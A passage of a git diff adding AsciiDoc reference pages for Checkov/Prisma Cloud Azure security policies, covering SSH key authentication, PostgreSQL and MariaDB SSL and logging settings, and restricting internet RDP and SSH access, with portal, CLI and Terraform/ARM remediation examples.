https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py[CKV_AZURE_148] +|LOW + + +|xref:ensure-azure-app-service-slot-has-debugging-disabled.adoc[Azure App service slot does not have debugging disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceSlotDebugDisabled.py[CKV_AZURE_155] +|LOW + + +|xref:ensure-azure-apps-service-slot-uses-the-latest-version-of-tls-encryption.adoc[Azure App Service slot does not use the latest version of TLS encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceSlotMinTLS.py[CKV_AZURE_154] +|LOW + + +|xref:ensure-azure-cognitive-services-accounts-disable-public-network-access.adoc[Azure Cognitive Services accounts enable public network access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CognitiveServicesDisablesPublicNetwork.py[CKV_AZURE_134] +|LOW + + +|xref:ensure-azure-databricks-workspace-is-not-public.adoc[Azure Databricks workspace is public] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py[CKV_AZURE_158] +|LOW + + +|xref:ensure-azure-function-app-uses-the-latest-version-of-tls-encryption.adoc[Azure Function app does not use the latest version of TLS encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py[CKV_AZURE_145] +|LOW + + +|xref:ensure-azure-http-port-80-access-from-the-internet-is-restricted.adoc[Azure HTTP (port 80) access from the internet is not restricted] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py[CKV_AZURE_160] +|LOW + + +|xref:ensure-azure-machine-learning-workspace-is-not-publicly-accessible.adoc[Azure Machine Learning Workspace is publicly
accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MLPublicAccess.py[CKV_AZURE_144] +|LOW + + +|xref:ensure-azure-postgresql-uses-the-latest-version-of-tls-encryption.adoc[Azure PostgreSQL does not use the latest version of TLS encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLMinTLSVersion.py[CKV_AZURE_147] +|LOW + + +|xref:ensure-azure-redis-cache-uses-the-latest-version-of-tls-encryption.adoc[Azure Redis Cache does not use the latest version of TLS encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py[CKV_AZURE_148] +|LOW + + +|xref:ensure-azure-spring-cloud-api-portal-is-enabled-for-https.adoc[Azure Spring Cloud API Portal is not enabled for HTTPS] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalHTTPSOnly.py[CKV_AZURE_161] +|LOW + + +|xref:ensure-azure-spring-cloud-api-portal-public-access-is-disabled.adoc[Azure Spring Cloud API Portal Public Access Is Enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalPublicAccessIsDisabled.py[CKV_AZURE_162] +|LOW + + +|xref:ensure-azure-web-app-redirects-all-http-traffic-to-https-in-azure-app-service-slot.adoc[Azure web app does not redirect all HTTP traffic to HTTPS in Azure App Service Slot] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py[CKV_AZURE_153] +|LOW + + + +|xref:ensure-cosmos-db-accounts-have-restricted-access.adoc[Cosmos DB accounts do not have restricted access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBAccountsRestrictedAccess.py[CKV_AZURE_99] +|LOW + + +|xref:ensure-front-door-waf-prevents-message-lookup-in-log4j2.adoc[Azure Front Door Web 
application firewall (WAF) policy rule for Remote Command Execution is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FrontDoorWAFACLCVE202144228.py[CKV_AZURE_133] +|MEDIUM + + +|xref:ensure-public-network-access-enabled-is-set-to-false-for-mysql-servers.adoc['Public network access enabled' is not set to 'False' for MySQL servers] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLPublicAccessDisabled.py[CKV_AZURE_53] +|MEDIUM + + +|xref:ensure-that-api-management-services-uses-virtual-networks.adoc[API management services do not use virtual networks] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/APIServicesUseVirtualNetwork.py[CKV_AZURE_107] +|LOW + + +|xref:ensure-that-application-gateway-enables-waf.adoc[Azure application gateway does not have WAF enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/common/graph/checks_infra/base_check.py[CKV_AZURE_120] +|LOW + + +|xref:ensure-that-application-gateway-uses-waf-in-detection-or-prevention-modes.adoc[Application gateway does not use WAF in Detection or Prevention modes] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppGWUseWAFMode.py[CKV_AZURE_122] +|LOW + + +|xref:ensure-that-azure-cache-for-redis-disables-public-network-access.adoc[Azure cache for Redis has public network access enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/RedisCachePublicNetworkAccessEnabled.py[CKV_AZURE_89] +|LOW + + +|xref:ensure-that-azure-cognitive-search-disables-public-network-access.adoc[Azure cognitive search does not disable public network access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureSearchPublicNetworkAccessDisabled.py[CKV_AZURE_124] +|LOW + +
+|xref:ensure-that-azure-container-container-group-is-deployed-into-virtual-network.adoc[Azure container container group is not deployed into a virtual network] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureContainerGroupDeployedIntoVirtualNetwork.py[CKV_AZURE_98] +|LOW + + +|xref:ensure-that-azure-cosmos-db-disables-public-network-access.adoc[Azure Cosmos DB enables public network access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBDisablesPublicNetwork.py[CKV_AZURE_101] +|LOW + + +|xref:ensure-that-azure-data-factory-public-network-access-is-disabled.adoc[Azure Data Factory (V2) configured with overly permissive network access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/DataFactoryNoPublicNetworkAccess.py[CKV_AZURE_104] +|HIGH + + +|xref:ensure-that-azure-event-grid-domain-public-network-access-is-disabled.adoc[Azure Event Grid domain public network access is enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/EventgridDomainNetworkAccess.py[CKV_AZURE_106] +|MEDIUM + + +|xref:ensure-that-azure-file-sync-disables-public-network-access.adoc[Azure file sync enables public network access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageSyncPublicAccessDisabled.py[CKV_AZURE_64] +|LOW + + +|xref:ensure-that-azure-front-door-enables-waf.adoc[Azure Front Door does not have the Azure Web application firewall (WAF) enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureFrontDoorEnablesWAF.py[CKV_AZURE_121] +|MEDIUM + + +|xref:ensure-that-azure-front-door-uses-waf-in-detection-or-prevention-modes.adoc[Azure front door does not use WAF in Detection or Prevention modes] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FrontdoorUseWAFMode.py[CKV_AZURE_123] +|LOW + + +|xref:ensure-that-azure-iot-hub-disables-public-network-access.adoc[Azure IoT Hub enables public network access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/IoTNoPublicNetworkAccess.py[CKV_AZURE_108] +|MEDIUM + + +|xref:ensure-that-azure-synapse-workspaces-enables-managed-virtual-networks.adoc[Azure Synapse Workspaces do not enable managed virtual networks] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesManagedVirtualNetworks.py[CKV_AZURE_58] +|LOW + + +|xref:ensure-that-azure-synapse-workspaces-have-no-ip-firewall-rules-attached.adoc[Azure Synapse workspaces have IP firewall rules attached] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml[CKV2_AZURE_19] +|LOW + + +|xref:ensure-that-function-apps-is-only-accessible-over-https.adoc[Azure Function App doesn't redirect HTTP to HTTPS] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py[CKV_AZURE_70] +|MEDIUM + + +|xref:ensure-that-key-vault-allows-firewall-rules-settings.adoc[Key vault does not allow firewall rules settings] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyVaultEnablesFirewallRulesSettings.py[CKV_AZURE_109] +|MEDIUM + + +|xref:ensure-that-network-interfaces-disable-ip-forwarding.adoc[Azure Virtual machine NIC has IP forwarding enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/NetworkInterfaceEnableIPForwarding.py[CKV_AZURE_118] +|MEDIUM + + +|xref:ensure-that-network-interfaces-dont-use-public-ips.adoc[Network interfaces use public IPs] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/common/graph/checks_infra/base_check.py[CKV_AZURE_119] +|LOW + + +|xref:ensure-that-only-ssl-are-enabled-for-cache-for-redis.adoc[Not only SSL are enabled for cache for Redis] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/RedisCacheEnableNonSSLPort.py[CKV_AZURE_91] +|LOW + + +|xref:ensure-that-postgresql-server-disables-public-network-access.adoc[PostgreSQL server does not disable public network access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLServerPublicAccessDisabled.py[CKV_AZURE_68] +|LOW + + +|xref:ensure-that-sql-server-disables-public-network-access.adoc[SQL Server is enabled for public network access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SQLServerPublicAccessDisabled.py[CKV_AZURE_113] +|LOW + + +|xref:ensure-that-storage-account-enables-secure-transfer.adoc[Storage Accounts without Secure transfer enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountEnablesSecureTransfer.py[CKV_AZURE_60] +|MEDIUM + + +|xref:ensure-that-storage-accounts-disallow-public-access.adoc[Azure storage account does allow public access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py[CKV_AZURE_59] +|LOW + + +|xref:ensure-that-udp-services-are-restricted-from-the-internet.adoc[Azure Network Security Group having Inbound rule overly permissive to all traffic on UDP protocol] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py[CKV_AZURE_77] +|HIGH + + +|xref:set-default-network-access-rule-for-storage-accounts-to-deny.adoc[Azure Storage Account default network access is set to 'Allow'] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/StorageAccountDefaultNetworkAccessDeny.py[CKV_AZURE_35] +|MEDIUM + + +|xref:set-public-access-level-to-private-for-blob-containers.adoc[Azure storage account has a blob container that is publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageBlobServiceContainerPrivateAccess.py[CKV_AZURE_34] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-1.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-1.adoc new file mode 100644 index 000000000..bbe32f400 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-1.adoc @@ -0,0 +1,132 @@ +== Azure instance does not authenticate using SSH keys +// Azure instance not authenticated through SSH + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7f59ef1f-0cbe-48cf-8358-05013b6a8a95 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureInstancePassword.py[CKV_AZURE_1] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +SSH is an encrypted connection protocol that allows secure sign-ins over unsecured connections. +SSH is the default connection protocol for Linux VMs hosted in Azure. +Using secure shell (SSH) key pairs, it is possible to spin up a Linux virtual machine on Azure that defaults to using SSH keys for authentication, eliminating the need for passwords to sign in. +We recommend connecting to a VM using SSH keys. +Using basic authentication with SSH connections leaves VMs vulnerable to brute-force attacks or guessing of passwords. 
+//// +=== Fix - Runtime + + +*Azure Portal: To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Enter *virtual machines* in the search bar. + +. Under *Services*, select *Virtual machines*. + +. Under *Administrator account*, select *SSH public key*. + +. For *SSH public key source*, use the default *Generate new key pair*, then for *Key pair name* enter *myKey*. + +. Under *Inbound port rules* > *Public inbound ports*, select *Allow selected ports*, then select *SSH (22)* and *HTTP (80)* from the drop-down. + +. Leave the remaining default settings. ++ +At the bottom of the page click *Review + create*. + + +*CLI Command* + + +The `--generate-ssh-keys` parameter automatically generates an SSH key and puts it in the default key location (~/.ssh). + + +[source,shell] +---- +az vm create \ +  --resource-group myResourceGroup \ +  --name myVM \ +  --image UbuntuLTS \ +  --admin-username azureuser \ +  --generate-ssh-keys +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_linux_virtual_machine +* *Arguments:* admin_ssh_key + + +[source,go] +---- +resource "azurerm_linux_virtual_machine" "example" { +  ... ++ admin_ssh_key { ++   username   = "adminuser" ++   public_key = file("~/.ssh/id_rsa.pub") ++ } +} +---- + + +*ARM Template* + + +* *Resource:* Microsoft.Compute/virtualMachines +* *Arguments:* disablePasswordAuthentication + + +[source,go] +---- +...
+"linuxConfiguration": { ++  "disablePasswordAuthentication": "true", +  "ssh": { +    "publicKeys": [ +      { +        "path": "string", +        "keyData": "string" +      } +    ] +  } +} +... +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-10.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-10.adoc new file mode 100644 index 000000000..3d821bc83 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-10.adoc @@ -0,0 +1,87 @@ +== Azure PostgreSQL database server with SSL connection disabled +// Azure PostgreSQL Database Server SSL connection disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bf4ad407-076c-40b9-a8fa-a0c80352a744 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLServerSSLEnforcementEnabled.py[CKV_AZURE_29] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + + + +=== Description + + +*SSL connectivity* provides an additional layer of security by connecting a database server to client applications using Secure Sockets Layer (SSL). +Enforcing SSL connections between a database server and client applications helps protect against _man-in-the-middle_ attacks. +This is achieved by encrypting the data stream between the server and application. +We recommend you set *Enforce SSL connection* to *Enabled* on PostgreSQL Server databases. +//// +=== Fix - Runtime + + +*Azure Portal: To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to *Azure Database for PostgreSQL server*. + +. For each database: a) Click *Connection security*. ++ +b) Navigate to the *SSL Settings* section. ++ +c) To *Enforce SSL connection* click *ENABLED*.
+ + +*CLI Command* + + +To set *Enforce SSL Connection* for a *PostgreSQL Database*, use the following command: +---- +az postgres server update +--resource-group <resourceGroupName> +--name <serverName> +--ssl-enforcement Enabled +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_postgresql_server +* *Arguments:* ssl_enforcement_enabled + + +[source,go] +---- +resource "azurerm_postgresql_server" "example" { +  ... ++ ssl_enforcement_enabled = true +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-11.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-11.adoc new file mode 100644 index 000000000..c0475fa01 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-11.adoc @@ -0,0 +1,92 @@ +== Azure PostgreSQL database server with log checkpoints parameter disabled +// Azure PostgreSQL Database Server 'log checkpoints' parameter disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 703f7b61-be54-4b6f-be1d-bab81899ec87 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLServerLogCheckpointsEnabled.py[CKV_AZURE_30] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + + + +=== Description + + +Enabling *log_checkpoints* helps the PostgreSQL Database to log each checkpoint and generate query and error logs. +Access to transaction logs is not supported. +Query and error logs can be used to identify, troubleshoot, repair configuration errors, and address sub-optimal performance issues. +We recommend you set *log_checkpoints* to *On* for PostgreSQL Server Databases. +//// +=== Fix - Runtime + + +*Azure Portal: To change the policy using the Azure Portal, follow these steps:* + + + +.
Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to Azure Database for PostgreSQL server. + +. For each database: a) Click *Server parameters*. ++ +b) Navigate to *log_checkpoints*. ++ +c) Click *On*. ++ +d) Click *Save*. + + +*CLI Command* + + +To update the *log_checkpoints* configuration, use the following command: +---- +az postgres server configuration set +--resource-group <resourceGroupName> +--server-name <serverName> +--name log_checkpoints +--value on +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_postgresql_configuration +* *Arguments:* name + value + + +[source,go] +---- +resource "azurerm_postgresql_configuration" "example" { +  name                = "log_checkpoints" +  resource_group_name = data.azurerm_resource_group.example.name +  server_name         = azurerm_postgresql_server.example.name +- value               = "off" ++ value               = "on" +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-12.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-12.adoc new file mode 100644 index 000000000..647f8a399 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-12.adoc @@ -0,0 +1,90 @@ +== Azure PostgreSQL database server with log connections parameter disabled +// Azure PostgreSQL Database Server 'log connections' parameter disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8673dba3-9bf5-4691-826e-b5fc7be70dad + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLServerLogConnectionsEnabled.py[CKV_AZURE_31] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + + + +=== Description + + +Enabling *log_connections* allows a PostgreSQL Database to log attempted connections to the server in addition to
logging the successful completion of client authentication. +Log data can be used to identify, troubleshoot, repair configuration errors, and address sub-optimal performance issues. +We recommend you set *log_connections* to *On* for PostgreSQL Server Databases. +//// +=== Fix - Runtime + + +*Azure Portal: To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to *Azure Database for PostgreSQL server*. + +. For each database: a) Click *Server parameters*. ++ +b) Navigate to *log_connections*. ++ +c) Click *On*. ++ +d) Click *Save*. + + +*CLI Command* + + +To update the *log_connections* configuration, use the following command: +---- +az postgres server configuration set +--resource-group <resourceGroupName> +--server-name <serverName> +--name log_connections +--value on +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_postgresql_configuration +* *Arguments:* name + value + + +[source,go] +---- +resource "azurerm_postgresql_configuration" "example" { +  name                = "log_connections" +  resource_group_name = data.azurerm_resource_group.example.name +  server_name         = azurerm_postgresql_server.example.name +- value               = "off" ++ value               = "on" +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-13.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-13.adoc new file mode 100644 index 000000000..35f413ee3 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-13.adoc @@ -0,0 +1,93 @@ +== Azure PostgreSQL database server with connection throttling parameter disabled +// Azure PostgreSQL Database Server 'connection throttling' parameter disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 43d57e9b-6080-4608-bbe3-e31611b5d240 + +|Checkov Check ID +|
https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py[CKV_AZURE_32] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + + + +=== Description + + +Enabling *connection_throttling* allows the PostgreSQL Database to set the verbosity of logged messages. +It generates query and error logs with respect to concurrent connections that could lead to a successful Denial of Service (DoS) attack by exhausting connection resources. +A system can also fail or be degraded by an overload of legitimate users. +Query and error logs can be used to identify, troubleshoot, repair configuration errors, and address sub-optimal performance issues. +We recommend you set *connection_throttling* to *On* for PostgreSQL Server Databases. +//// +=== Fix - Runtime + + +*Azure Portal: To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to *Azure Database for PostgreSQL server*. + +. For each database: a) Click *Server parameters*. ++ +b) Navigate to *connection_throttling*. ++ +c) Click *On*. ++ +d) Click *Save*.
+ + +*CLI Command* + + +To update the *connection_throttling* configuration, use the following command: +---- +az postgres server configuration set +--resource-group <resourceGroupName> +--server-name <serverName> +--name connection_throttling +--value on +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_postgresql_configuration +* *Arguments:* name + value + + +[source,go] +---- +resource "azurerm_postgresql_configuration" "example" { +  name                = "connection_throttling" +  resource_group_name = data.azurerm_resource_group.example.name +  server_name         = azurerm_postgresql_server.example.name +- value               = "off" ++ value               = "on" +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-17.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-17.adoc new file mode 100644 index 000000000..2cfd8a251 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-17.adoc @@ -0,0 +1,57 @@ +== Azure MariaDB database server with SSL connection disabled +// Azure MariaDB Database Server SSL connection disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 57d0cd4e-e3ce-4ef2-83ec-97f6b5ac24b3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py[CKV_AZURE_47] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + + + +=== Description + + +Azure Database for MariaDB supports connecting your Azure Database for MariaDB server to client applications using Secure Sockets Layer (SSL). +Enforcing SSL connections between your database server and your client applications helps protect against 'man in the middle' attacks by encrypting the data stream between the server and your application.
+This configuration enforces that SSL is always enabled for accessing your database server. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_mariadb_server +* *Arguments:* ssl_enforcement_enabled + + +[source,go] +---- +resource "azurerm_mariadb_server" "example" { +  ... ++ ssl_enforcement_enabled = true +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-2.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-2.adoc new file mode 100644 index 000000000..5f6ef7fb8 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-2.adoc @@ -0,0 +1,125 @@ +== Azure RDP Internet access is not restricted +// Azure RDP internet access not restricted + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c5b550a1-6a53-4033-a0a3-95fe4e45349e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py[CKV_AZURE_9] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +*Azure RDP Internet access is not restricted* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c5b550a1-6a53-4033-a0a3-95fe4e45349e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py[CKV_AZURE_9] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== +//// + + +=== Description + + +A potential security problem using RDP over the Internet is that attackers can use various brute force techniques to gain access to Azure Virtual Machines.
+Once the attackers gain access, they can use a virtual machine as a launch point for compromising other machines on the Azure Virtual Network. +The attackers could also access and attack networked devices outside of Azure. +We recommend you disable RDP access from the internet in Network Security Groups. +//// +=== Fix - Runtime + + +*Azure Portal: To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. For each VM, open the *Networking* blade. + +. Verify that *INBOUND PORT RULES* does not have a rule for RDP. ++ +For example: ++ +* Port = 3389 ++ +* Protocol = TCP ++ +* Source = Any OR Internet + + +*CLI Command* + + +To list Network Security Groups with the corresponding non-default Security rules, use the following command: `az network nsg list --query [*].[name,securityRules]` +Ensure that the NSGs do not have any of the following security rules: +* "access" : "Allow" +* "destinationPortRange" : "3389" or "*" or "[port range containing 3389]" +* "direction" : "Inbound" +* "protocol" : "TCP" +* "sourceAddressPrefix" : "*" or "0.0.0.0" or "<nw>/0" or "/0" or "internet" or "any" +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_network_security_rule +* *Arguments:* access + protocol + destination_port_range + source_address_prefix + + +[source,go] +---- +resource "azurerm_network_security_rule" "example" { +  ... +- access                 = "Allow" +- protocol               = "TCP" +- destination_port_range = "3389" # or "*", or a range containing 3389 +- source_address_prefix  = "*" # or "0.0.0.0", "<nw>/0", "/0", "internet", "any" +  ...
+} +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-3.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-3.adoc new file mode 100644 index 000000000..dc23a6606 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-3.adoc @@ -0,0 +1,122 @@ +== Azure Network Security Group allows all traffic on SSH (port 22) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 062a3a24-122c-4335-8883-9991039e1776 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py[CKV_AZURE_10] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +*Azure Network Security Group allows all traffic on SSH (port 22)* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 062a3a24-122c-4335-8883-9991039e1776 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py[CKV_AZURE_10] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== +//// + + +=== Description + + +A potential security problem using SSH over the Internet is that attackers can use various brute force techniques to gain access to Azure Virtual Machines. +Once the attackers gain access, they can use a virtual machine as a launch point for compromising other machines on the Azure Virtual Network. +The attackers could also access and attack networked devices outside of Azure. +We recommend you disable SSH access from the internet in Network Security Groups. +//// +=== Fix - Runtime + + +*Azure Portal: To change the policy using the Azure Portal, follow these steps:* + + + +.
Log in to the Azure Portal at https://portal.azure.com. + +. For each VM, open the *Networking* blade. + +. Verify that *INBOUND PORT RULES* does not have a rule for SSH. ++ +For example: ++ +* Port = 22 ++ +* Protocol = TCP ++ +* Source = Any OR Internet + + +*CLI Command* + + +To list Network Security Groups with corresponding non-default Security rules, use the following command: `az network nsg list --query [*].[name,securityRules]` +Ensure that the NSGs do not have any of the following security rules: +* "access" : "Allow" +* "destinationPortRange" : "22" or "*" or "[port range containing 22]" +* "direction" : "Inbound" +* "protocol" : "TCP" +* "sourceAddressPrefix" : "*" or "0.0.0.0" or "<nw>/0" or "/0" or "internet" or "any" +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_network_security_rule +* *Arguments:* access + protocol + destination_port_range + source_address_prefix + + +[source,go] +---- +resource "azurerm_network_security_rule" "example" { +- access                 = "Allow" +- protocol               = "TCP" +- destination_port_range = "22" # or "*", or a range containing 22 +- source_address_prefix  = "*" # or "0.0.0.0", "<nw>/0", "/0", "internet", "any" +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-4.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-4.adoc new file mode 100644 index 000000000..765a9c792 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-4.adoc @@ -0,0 +1,133 @@ +== Azure SQL Servers Firewall rule allow ingress access 